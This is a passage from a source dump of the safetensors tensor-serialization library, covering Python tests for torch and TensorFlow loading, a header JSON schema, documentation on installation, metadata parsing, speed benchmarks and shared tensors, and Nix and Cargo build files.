235 | # This passes on torch. 236 | # The tensors are shared on disk, they are *not* shared within the model 237 | # The model happily loads the tensors, and ends up *not* sharing the tensors by. 238 | # doing copies 239 | self.assertEqual( 240 | _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] 241 | ) 242 | model2.load_state_dict(torch.load("tmp2.bin")) 243 | self.assertEqual( 244 | _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] 245 | ) 246 | 247 | # However safetensors cannot save those, so we cannot 248 | # reload the saved file with the different model 249 | save_model(model, "tmp2.safetensors") 250 | with self.assertRaises(RuntimeError) as ctx: 251 | load_model(model2, "tmp2.safetensors") 252 | self.assertIn("""Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)) 253 | 254 | def test_difference_torch_odd(self): 255 | model = NoSharedModel() 256 | a = model.a.weight 257 | b = model.b.weight 258 | self.assertNotEqual(a.data_ptr(), b.data_ptr()) 259 | torch.save(model.state_dict(), "tmp3.bin") 260 | 261 | model2 = Model() 262 | self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}]) 263 | # Torch will affect either `b` or `a` to the shared tensor in the `model2` 264 | model2.load_state_dict(torch.load("tmp3.bin")) 265 | 266 | # XXX: model2 uses only the B weight not the A weight anymore. 267 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight)) 268 | torch.testing.assert_close(model2.a.weight, model.b.weight) 269 | self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}]) 270 | 271 | # Everything is saved as-is 272 | save_model(model, "tmp3.safetensors") 273 | # safetensors will yell that there were 2 tensors on disk, while 274 | # the models expects only 1 tensor since both are shared. 275 | with self.assertRaises(RuntimeError) as ctx: 276 | load_model(model2, "tmp3.safetensors") 277 | # Safetensors properly warns the user that some ke 278 | self.assertIn("""Unexpected key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)) 279 | -------------------------------------------------------------------------------- /bindings/python/tests/test_tf_comparison.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | 3 | import h5py 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import safe_open 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(f, tensors=None, prefix=""): 12 | if tensors is None: 13 | tensors = {} 14 | for k in f.keys(): 15 | if isinstance(f[k], h5py._hl.dataset.Dataset): 16 | key = k if not prefix else f"{prefix}_{k}" 17 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 18 | else: 19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 20 | return tensors 21 | 22 | 23 | def _save(f, tensors, prefix=""): 24 | for name, tensor in tensors.items(): 25 | tensor = tensor.numpy() 26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 27 | dset[:] = tensor 28 | 29 | 30 | class SafeTestCase(unittest.TestCase): 31 | def setUp(self): 32 | data = { 33 | "test": tf.zeros((1024, 1024), dtype=tf.float32), 34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32), 35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32), 36 | } 37 | self.tf_filename = "./tests/data/tf_load.h5" 38 | self.sf_filename = "./tests/data/tf_load.safetensors" 39 | 40 | with h5py.File(self.tf_filename, "w") as f: 41 | _save(f, data) 42 | save_file(data, self.sf_filename) 43 | 44 | def test_zero_sized(self): 45 | data = { 46 | "test": tf.zeros((2, 0), dtype=tf.float32), 47 | } 48 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 49 | save_file(data.copy(), local) 50 | reloaded = load_file(local) 51 | # Empty tensor != empty tensor on numpy, so comparing shapes 52 | # instead 53 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 54 | 55 | def test_deserialization_safe(self): 56 | weights = load_file(self.sf_filename) 57 | 58 | with h5py.File(self.tf_filename, "r") as f: 59 | tf_weights = _load(f) 60 | 61 | for k, v in weights.items(): 62 | tv = tf_weights[k] 63 | self.assertTrue(np.allclose(v, tv)) 64 | 65 | def test_bfloat16(self): 66 | data = { 67 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16), 68 | } 69 | save_file(data, self.sf_filename) 70 | weights = {} 71 | with safe_open(self.sf_filename, framework="tf") as f: 72 | for k in f.keys(): 73 | weights[k] = f.get_tensor(k) 74 | 75 | for k, v in weights.items(): 76 | tv = data[k] 77 | self.assertTrue(tf.experimental.numpy.allclose(v, tv)) 78 | 79 | def test_deserialization_safe_open(self): 80 | weights = {} 81 | with safe_open(self.sf_filename, framework="tf") as f: 82 | for k in f.keys(): 83 | weights[k] = f.get_tensor(k) 84 | 85 | with h5py.File(self.tf_filename, "r") as f: 86 | tf_weights = _load(f) 87 | 88 | for k, v in weights.items(): 89 | tv = tf_weights[k] 90 | self.assertTrue(np.allclose(v, tv)) 91 | -------------------------------------------------------------------------------- /codecov.yaml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /codecov.yml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /docs/safetensors.schema.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://json-schema.org/draft/2020-12/schema", 3 | "title": "safetensors format header", 4 | "description": "Describes the structure of all the tensors and their metadata", 5 | "$defs": { 6 | "size_t": { 7 | "type": "integer", 8 | "minimum": 0, 9 | "maximum": 281474976710655, 10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)" 11 | }, 12 | "Tensor": { 13 | "title": "Tensor", 14 | "description": "Describes the structure of one tensor", 15 | "type": "object", 16 | "additionalProperties": false, 17 | "properties": { 18 | "dtype": { 19 | "type": "string", 20 | "pattern": "([UIF])(8|16|32|64|128|256)", 21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits." 22 | }, 23 | "shape": { 24 | "type": "array", 25 | "items": { 26 | "$ref": "#/$defs/size_t", 27 | "description": "Size of each dimension." 28 | } 29 | }, 30 | "data_offsets": { 31 | "type": "array", 32 | "prefixItems": [ 33 | { 34 | "$ref": "#/$defs/size_t", 35 | "description": "Start offset of the array. " 36 | }, 37 | { 38 | "$ref": "#/$defs/size_t", 39 | "description": "End offset of the array. Equal to the previous item + array size." 40 | } 41 | ] 42 | } 43 | }, 44 | "required": [ 45 | "data_offsets", 46 | "dtype", 47 | "shape" 48 | ] 49 | }, 50 | "Metadata": { 51 | "type": "object", 52 | "additionalProperties": {"type": "string"}, 53 | "title": "Metadata" 54 | } 55 | }, 56 | "type": "object", 57 | "properties": { 58 | "__metadata__": { 59 | "description": "Arbitrary metadata", 60 | "$ref": "#/$defs/Metadata" 61 | } 62 | }, 63 | "additionalProperties": { 64 | "$ref": "#/$defs/Tensor" 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /docs/source/_toctree.yml: -------------------------------------------------------------------------------- 1 | - sections: 2 | - local: index 3 | title: 🤗 Safetensors 4 | - local: speed 5 | title: Speed Comparison 6 | - local: torch_shared_tensors 7 | title: Tensor Sharing in Pytorch 8 | - local: metadata_parsing 9 | title: Metadata Parsing 10 | - local: convert-weights 11 | title: Convert weights to safetensors 12 | title: Getting started 13 | - sections: 14 | - local: api/torch 15 | title: Torch API 16 | - local: api/tensorflow 17 | title: Tensorflow API 18 | - local: api/paddle 19 | title: PaddlePaddle API 20 | - local: api/flax 21 | title: Flax API 22 | - local: api/numpy 23 | title: Numpy API 24 | title: API 25 | -------------------------------------------------------------------------------- /docs/source/api/flax.mdx: -------------------------------------------------------------------------------- 1 | # Flax API 2 | 3 | [[autodoc]] safetensors.flax.load_file 4 | [[autodoc]] safetensors.flax.load 5 | [[autodoc]] safetensors.flax.save_file 6 | [[autodoc]] safetensors.flax.save 7 | -------------------------------------------------------------------------------- /docs/source/api/numpy.mdx: -------------------------------------------------------------------------------- 1 | # Numpy API 2 | 3 | [[autodoc]] safetensors.numpy.load_file 4 | [[autodoc]] safetensors.numpy.load 5 | [[autodoc]] safetensors.numpy.save_file 6 | [[autodoc]] safetensors.numpy.save 7 | -------------------------------------------------------------------------------- /docs/source/api/paddle.mdx: -------------------------------------------------------------------------------- 1 | # PaddlePaddle API 2 | 3 | [[autodoc]] safetensors.paddle.load_file 4 | [[autodoc]] safetensors.paddle.load 5 | [[autodoc]] safetensors.paddle.save_file 6 | [[autodoc]] safetensors.paddle.save 7 | -------------------------------------------------------------------------------- /docs/source/api/tensorflow.mdx: -------------------------------------------------------------------------------- 1 | # Tensorflow API 2 | 3 | [[autodoc]] safetensors.tensorflow.load_file 4 | [[autodoc]] safetensors.tensorflow.load 5 | [[autodoc]] safetensors.tensorflow.save_file 6 | [[autodoc]] safetensors.tensorflow.save 7 | -------------------------------------------------------------------------------- /docs/source/api/torch.mdx: -------------------------------------------------------------------------------- 1 | # Torch API 2 | 3 | [[autodoc]] safetensors.torch.load_file 4 | [[autodoc]] safetensors.torch.load 5 | [[autodoc]] safetensors.torch.save_file 6 | [[autodoc]] safetensors.torch.save 7 | [[autodoc]] safetensors.torch.load_model 8 | [[autodoc]] safetensors.torch.save_model 9 | -------------------------------------------------------------------------------- /docs/source/convert-weights.md: -------------------------------------------------------------------------------- 1 | # Convert weights to safetensors 2 | 3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`. 4 | 5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository. 6 | 7 | 8 | 9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights. 10 | 11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space. 12 | 13 | 14 | -------------------------------------------------------------------------------- /docs/source/index.mdx: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 |
7 | 8 | # Safetensors 9 | 10 | Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed). 11 | 12 | ## Installation 13 | 14 | with pip: 15 | ``` 16 | pip install safetensors 17 | ``` 18 | 19 | with conda: 20 | ``` 21 | conda install -c huggingface safetensors 22 | ``` 23 | 24 | ## Usage 25 | 26 | ### Load tensors 27 | 28 | ```python 29 | from safetensors import safe_open 30 | 31 | tensors = {} 32 | with safe_open("model.safetensors", framework="pt", device=0) as f: 33 | for k in f.keys(): 34 | tensors[k] = f.get_tensor(k) 35 | ``` 36 | 37 | Loading only part of the tensors (interesting when running on multiple GPU) 38 | 39 | ```python 40 | from safetensors import safe_open 41 | 42 | tensors = {} 43 | with safe_open("model.safetensors", framework="pt", device=0) as f: 44 | tensor_slice = f.get_slice("embedding") 45 | vocab_size, hidden_dim = tensor_slice.get_shape() 46 | tensor = tensor_slice[:, :hidden_dim] 47 | ``` 48 | 49 | ### Save tensors 50 | 51 | ```python 52 | import torch 53 | from safetensors.torch import save_file 54 | 55 | tensors = { 56 | "embedding": torch.zeros((2, 2)), 57 | "attention": torch.zeros((2, 3)) 58 | } 59 | save_file(tensors, "model.safetensors") 60 | ``` 61 | 62 | ## Format 63 | 64 | Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format: 65 | 66 |
67 | 68 |
69 | 70 | ## Featured Projects 71 | 72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors: 73 | 74 | * [huggingface/transformers](https://github.com/huggingface/transformers) 75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx) 76 | * [huggingface/candle](https://github.com/huggingface/candle) 77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) 78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537) 79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix) 80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI) 81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models) 82 | * [CivitAI](https://civitai.com/) 83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers) 84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx) 85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI) 86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui) 87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner) 88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP) 89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT) 90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry) 91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI) 92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE) 93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax) 94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic) 95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures) 96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors) 97 | -------------------------------------------------------------------------------- /docs/source/metadata_parsing.mdx: -------------------------------------------------------------------------------- 1 | # Metadata Parsing 2 | 3 | Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests). 4 | 5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language. 6 | 7 | ## Example use case 8 | 9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights: 10 | 11 |
12 | 13 | 14 |
15 | 16 |
17 | 18 | 19 |
20 | 21 | ## Usage 22 | 23 | 24 | 25 | 26 | From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In this example python script below (you can use any language that has HTTP requests support), we are parsing metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors). 27 | 28 | ```python 29 | import requests # pip install requests 30 | import struct 31 | 32 | def parse_single_file(url): 33 | # Fetch the first 8 bytes of the file 34 | headers = {'Range': 'bytes=0-7'} 35 | response = requests.get(url, headers=headers) 36 | # Interpret the bytes as a little-endian unsigned 64-bit integer 37 | length_of_header = struct.unpack(' 60 | 61 | 62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js) 63 | 64 | ```ts 65 | import { parseSafetensorsMetadata } from "@huggingface/hub"; 66 | 67 | const info = await parseSafetensorsMetadata({ 68 | repo: { type: "model", name: "bigscience/bloom" }, 69 | }); 70 | 71 | console.log(info) 72 | // { 73 | // sharded: true, 74 | // index: { 75 | // metadata: { total_size: 352494542848 }, 76 | // weight_map: { 77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors', 78 | // ... 79 | // } 80 | // }, 81 | // headers: { 82 | // __metadata__: {'format': 'pt'}, 83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]}, 84 | // ... 85 | // } 86 | // } 87 | ``` 88 | 89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be: 90 | 91 | ```ts 92 | export type SafetensorsParseFromRepo = 93 | | { 94 | sharded: false; 95 | header: SafetensorsFileHeader; 96 | } 97 | | { 98 | sharded: true; 99 | index: SafetensorsIndexJson; 100 | headers: SafetensorsShardedHeaders; 101 | }; 102 | ``` 103 | 104 | where the underlying `types` are the following: 105 | 106 | ```ts 107 | type FileName = string; 108 | 109 | type TensorName = string; 110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL"; 111 | 112 | interface TensorInfo { 113 | dtype: Dtype; 114 | shape: number[]; 115 | data_offsets: [number, number]; 116 | } 117 | 118 | type SafetensorsFileHeader = Record & { 119 | __metadata__: Record; 120 | }; 121 | 122 | interface SafetensorsIndexJson { 123 | weight_map: Record; 124 | } 125 | 126 | export type SafetensorsShardedHeaders = Record; 127 | ``` 128 | 129 | 130 | 131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata. 132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model. 133 | Depending on if the model is sharded or not, one or multiple safetensors files will be parsed. 134 | 135 | ```python 136 | >>> from huggingface_hub import get_safetensors_metadata 137 | 138 | # Parse repo with single weights file 139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m") 140 | >>> metadata 141 | SafetensorsRepoMetadata( 142 | metadata=None, 143 | sharded=False, 144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...}, 145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)} 146 | ) 147 | >>> metadata.files_metadata["model.safetensors"].metadata 148 | {'format': 'pt'} 149 | 150 | # Parse repo with sharded model (i.e. multiple weights files) 151 | >>> metadata = get_safetensors_metadata("bigscience/bloom") 152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s] 153 | >>> metadata 154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...}) 155 | >>> len(metadata.files_metadata) 156 | 72 # All safetensors files have been fetched 157 | 158 | # Parse repo that is not a safetensors repo 159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5") 160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files. 161 | ``` 162 | 163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata). 164 | 165 | 166 | 167 | 168 | ## Example output 169 | 170 | For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage. 171 | 172 | model | safetensors | params 173 | --- | --- | --- 174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 } 175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 } 176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 } 177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 } 178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 } 179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 } 180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 } 181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 } 182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 } 183 | -------------------------------------------------------------------------------- /docs/source/speed.mdx: -------------------------------------------------------------------------------- 1 | # Speed Comparison 2 | 3 | 4 | Open In Colab 9 | 10 | 11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab. 12 | 13 | Before you begin, make sure you have all the necessary libraries installed: 14 | 15 | ```bash 16 | pip install safetensors huggingface_hub torch 17 | ``` 18 | 19 | Let's start by importing all the packages that will be used: 20 | 21 | ```py 22 | >>> import os 23 | >>> import datetime 24 | >>> from huggingface_hub import hf_hub_download 25 | >>> from safetensors.torch import load_file 26 | >>> import torch 27 | ``` 28 | 29 | Download safetensors & torch weights for gpt2: 30 | 31 | ```py 32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors") 33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin") 34 | ``` 35 | 36 | ### CPU benchmark 37 | 38 | ```py 39 | >>> start_st = datetime.datetime.now() 40 | >>> weights = load_file(sf_filename, device="cpu") 41 | >>> load_time_st = datetime.datetime.now() - start_st 42 | >>> print(f"Loaded safetensors {load_time_st}") 43 | 44 | >>> start_pt = datetime.datetime.now() 45 | >>> weights = torch.load(pt_filename, map_location="cpu") 46 | >>> load_time_pt = datetime.datetime.now() - start_pt 47 | >>> print(f"Loaded pytorch {load_time_pt}") 48 | 49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") 50 | Loaded safetensors 0:00:00.004015 51 | Loaded pytorch 0:00:00.307460 52 | on CPU, safetensors is faster than pytorch by: 76.6 X 53 | ``` 54 | 55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282). 56 | The currently shown speedup was gotten on: 57 | * OS: Ubuntu 18.04.6 LTS 58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz 59 | 60 | 61 | ### GPU benchmark 62 | 63 | ```py 64 | >>> # This is required because this feature hasn't been fully verified yet, but 65 | >>> # it's been tested on many different environments 66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1" 67 | 68 | >>> # CUDA startup out of the measurement 69 | >>> torch.zeros((2, 2)).cuda() 70 | 71 | >>> start_st = datetime.datetime.now() 72 | >>> weights = load_file(sf_filename, device="cuda:0") 73 | >>> load_time_st = datetime.datetime.now() - start_st 74 | >>> print(f"Loaded safetensors {load_time_st}") 75 | 76 | >>> start_pt = datetime.datetime.now() 77 | >>> weights = torch.load(pt_filename, map_location="cuda:0") 78 | >>> load_time_pt = datetime.datetime.now() - start_pt 79 | >>> print(f"Loaded pytorch {load_time_pt}") 80 | 81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") 82 | Loaded safetensors 0:00:00.165206 83 | Loaded pytorch 0:00:00.353889 84 | on GPU, safetensors is faster than pytorch by: 2.1 X 85 | ``` 86 | 87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU. 88 | The currently shown speedup was gotten on: 89 | * OS: Ubuntu 18.04.6 LTS. 90 | * GPU: Tesla T4 91 | * Driver Version: 460.32.03 92 | * CUDA Version: 11.2 93 | -------------------------------------------------------------------------------- /docs/source/torch_shared_tensors.mdx: -------------------------------------------------------------------------------- 1 | # Torch shared tensors 2 | 3 | 4 | ## TL;DR 5 | 6 | Using specific functions, which should work in most cases for you. 7 | This is not without side effects. 8 | 9 | ```python 10 | from safetensors.torch import load_model, save_model 11 | 12 | save_model(model, "model.safetensors") 13 | # Instead of save_file(model.state_dict(), "model.safetensors") 14 | 15 | load_model(model, "model.safetensors") 16 | # Instead of model.load_state_dict(load_file("model.safetensors")) 17 | ``` 18 | 19 | ## What are shared tensors ? 20 | 21 | Pytorch uses shared tensors for some computation. 22 | This is extremely interesting to reduce memory usage in general. 23 | 24 | One very classic use case is in transformers the `embeddings` are shared with 25 | `lm_head`. By using the same matrix, the model uses less parameters, and gradients 26 | flow much better to the `embeddings` (which is the start of the model, so they don't 27 | flow easily there, whereas `lm_head` is at the tail of the model, so gradients are 28 | extremely good over there, since they are the same tensors, they both benefit) 29 | 30 | 31 | ```python 32 | from torch import nn 33 | 34 | class Model(nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = nn.Linear(100, 100) 38 | self.b = self.a 39 | 40 | def forward(self, x): 41 | return self.b(self.a(x)) 42 | 43 | 44 | model = Model() 45 | print(model.state_dict()) 46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias']) 47 | torch.save(model.state_dict(), "model.bin") 48 | # This file is now 41k instead of ~80k, because A and B are the same weight hence only 1 is saved on disk with both `a` and `b` pointing to the same buffer 49 | ``` 50 | 51 | ## Why are shared tensors not saved in `safetensors` ? 52 | 53 | Multiple reasons for that: 54 | 55 | - *Not all frameworks support them* for instance `tensorflow` does not. 56 | So if someone saves shared tensors in torch, there is no way to 57 | load them in a similar fashion so we could not keep the same `Dict[str, Tensor]` 58 | API. 59 | - *It makes lazy loading very quickly.* 60 | Lazy loading is the ability to load only some tensors, or part of tensors for 61 | a given file. This is trivial to do without sharing tensors but with tensor sharing 62 | 63 | ```python 64 | with safe_open("model.safetensors", framework="pt") as f: 65 | a = f.get_tensor("a") 66 | b = f.get_tensor("b") 67 | ``` 68 | 69 | Now it's impossible with this given code to "reshare" buffers after the fact. 70 | Once we give the `a` tensor we have no way to give back the same memory when 71 | you ask for `b`. (In this particular example we could keep track of given buffers 72 | but this is not the case in general, since you could do arbitrary work with `a` 73 | like sending it to another device before asking for `b`) 74 | - *It can lead to much larger file than necessary*. 75 | If you are saving a shared tensor which is only a fraction of a larger tensor, 76 | then saving it with pytorch leads to saving the entire buffer instead of saving 77 | just what is needed. 78 | 79 | ```python 80 | a = torch.zeros((100, 100)) 81 | b = a[:1, :] 82 | torch.save({"b": b}, "model.bin") 83 | # File is 41k instead of the expected 400 bytes 84 | # In practice it could happen that you save several 10GB instead of 1GB. 85 | ``` 86 | 87 | Now with all those reasons being mentioned, nothing is set in stone in there. 88 | Shared tensors do not cause unsafety, or denial of service potential, so this 89 | decision could be revisited if current workarounds are not satisfactory. 90 | 91 | ## How does it work ? 92 | 93 | The design is rather simple. 94 | We're going to look for all shared tensors, then looking for all tensors 95 | covering the entire buffer (there can be multiple such tensors). 96 | That gives us multiple names which can be saved, we simply choose the first one 97 | 98 | During `load_model`, we are loading a bit like `load_state_dict` does, except 99 | we're looking into the model itself, to check for shared buffers, and ignoring 100 | the "missed keys" which were actually covered by virtue of buffer sharing (they 101 | were properly loaded since there was a buffer that loaded under the hood). 102 | Every other error is raised as-is 103 | 104 | **Caveat**: This means we're dropping some keys within the file. meaning if you're 105 | checking for the keys saved on disk, you will see some "missing tensors" or if you're 106 | using `load_state_dict`. Unless we start supporting shared tensors directly in 107 | the format there's no real way around it. 108 | -------------------------------------------------------------------------------- /flake.lock: -------------------------------------------------------------------------------- 1 | { 2 | "nodes": { 3 | "nixpkgs": { 4 | "locked": { 5 | "lastModified": 1730531603, 6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=", 7 | "owner": "NixOS", 8 | "repo": "nixpkgs", 9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d", 10 | "type": "github" 11 | }, 12 | "original": { 13 | "owner": "NixOS", 14 | "ref": "nixos-unstable", 15 | "repo": "nixpkgs", 16 | "type": "github" 17 | } 18 | }, 19 | "root": { 20 | "inputs": { 21 | "nixpkgs": "nixpkgs" 22 | } 23 | } 24 | }, 25 | "root": "root", 26 | "version": 7 27 | } 28 | -------------------------------------------------------------------------------- /flake.nix: -------------------------------------------------------------------------------- 1 | { 2 | inputs = { 3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; 4 | }; 5 | 6 | outputs = 7 | { nixpkgs, ... }: 8 | let 9 | forAllSystems = nixpkgs.lib.genAttrs [ 10 | "aarch64-linux" 11 | "x86_64-linux" 12 | "aarch64-darwin" 13 | ]; 14 | in 15 | { 16 | devShells = forAllSystems ( 17 | system: 18 | let 19 | pkgs = nixpkgs.legacyPackages.${system}; 20 | in 21 | { 22 | default = pkgs.mkShell { 23 | buildInputs = with pkgs; [ 24 | rustup 25 | python3Packages.python 26 | python3Packages.venvShellHook 27 | ]; 28 | venvDir = "./.venv"; 29 | postVenvCreation = '' 30 | unset SOURCE_DATE_EPOCH 31 | ''; 32 | postShellHook = '' 33 | unset SOURCE_DATE_EPOCH 34 | ''; 35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib"; 36 | }; 37 | 38 | } 39 | ); 40 | }; 41 | } 42 | -------------------------------------------------------------------------------- /safetensors/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors" 3 | version = "0.5.3-dev.0" 4 | edition = "2021" 5 | rust-version = "1.74" 6 | homepage = "https://github.com/huggingface/safetensors" 7 | repository = "https://github.com/huggingface/safetensors" 8 | documentation = "https://docs.rs/safetensors/" 9 | license = "Apache-2.0" 10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"] 11 | readme = "./README.md" 12 | description = """ 13 | Provides functions to read and write safetensors which aim to be safer than 14 | their PyTorch counterpart. 